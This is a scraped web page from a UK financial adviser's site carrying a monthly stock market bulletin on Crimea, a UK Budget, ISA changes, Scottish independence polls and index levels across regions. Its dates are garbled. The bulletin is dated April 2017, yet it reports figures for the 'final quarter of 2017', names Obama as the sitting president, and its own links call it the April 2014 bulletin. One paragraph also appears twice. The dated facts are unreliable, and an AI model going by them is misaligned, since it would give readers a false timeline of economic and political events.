</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										April 2017 Stock Market Bulletin										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li><a href=\"../category\" title=\"Investments\">Investments</a></li><li>April 2017 Stock Market Bulletin</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-8121\" class=\"post-8121 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">April 2017 Stock Market Bulletin</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n		  <h1 style=\"text-align: left;\">Stock Market Bulletin</h1>&#13;\n<h3 style=\"text-align: left;\">April 3rd 2017 – Reading time 10 minutes&#13;\n</h3><p> </p>&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p>We started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.</p>&#13;\n<p>Well, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.</p>&#13;\n<p>The question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…</p>&#13;\n<p/>&#13;\n<p>The question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…</p>&#13;\n<p>Not that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.</p>&#13;\n<p>In the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.</p>&#13;\n<p>The Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.</p>&#13;\n<p>World stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1><span style=\"color: #0000ff;\"><b>United Kingdom</b></span></h1>&#13;\n<p>As noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.</p>&#13;\n<p>The Chancellor was, he said, “Prepared to trust the British people.”</p>&#13;\n<p><a href=\"#\"/></p>&#13;\n<p>There were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…</p>&#13;\n<p>This monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.</p>&#13;\n<p>Meanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.</p>&#13;\n<p>Bad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup></p>&#13;\n<p>Two pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.</p>&#13;\n<p>Meanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.</p>&#13;\n<p>What does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four million.</p>&#13;\n<p>The FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.</p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>&#13;\n<p>March saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.</p>&#13;\n<p>French industrial production also fell by 0.2% against expectations of 0.2% growth.</p>&#13;\n<p/>&#13;\n<p>Meanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.</p>&#13;\n<p>That said, industrial production remains 24% lower than in 2008, so there is still some way to go…</p>&#13;\n<p>Figures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).</p>&#13;\n<p>The German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.</p>&#13;\n<p>On the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.</p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>&#13;\n<p>In the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.</p>&#13;\n<p/>&#13;\n<p/>&#13;\n<p>GDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.</p>&#13;\n<p>For now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.</p>&#13;\n<p>No lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…</p>&#13;\n<p>The Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.</p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>&#13;\n<p>Despite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.</p>&#13;\n<p style=\"text-align: center;\"/>&#13;\n<p>Industrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.</p>&#13;\n<p>Consumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.</p>&#13;\n<p>With investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.</p>&#13;\n<p>President Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.</p>&#13;\n<p>Japan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.</p>&#13;\n<p>No such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.</p>&#13;\n<p>The South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.</p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>&#13;\n<p>It’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.</p>&#13;\n<p>However, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.</p>&#13;\n<p>As indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).</p>&#13;\n<p/>&#13;\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>&#13;\n<p>Many London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.</p>&#13;\n<p>London Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.</p>&#13;\n<p>Sadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.</p>&#13;\n<p>In the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category\" title=\"View all posts in Investments\" rel=\"category tag\">Investments</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../april-2014-stock-market-bulletin/\" title=\"Comment on April 2014 Stock Market Bulletin\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fapril-2014-stock-market-bulletin%2F&amp;name=April+2014+Stock+Market+Bulletin&amp;description=We+started+last+month%E2%80%99s+bulletin+in+the+Crimea%2C+with+Russian+troops+in+de+facto+control+of+the+peninsula.+Well%2C+the+Crimea+is+now+part+of+Russia+again+and+the+collected+denunciations+and+threatened+sanctions+....\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=April 2014 Stock Market Bulletin&amp;body=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../april-2014-stock-market-bulletin/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8121\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"ed534b789c\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"25\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"><div class=\"avada-row\"/>&#13;\n	</footer><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" 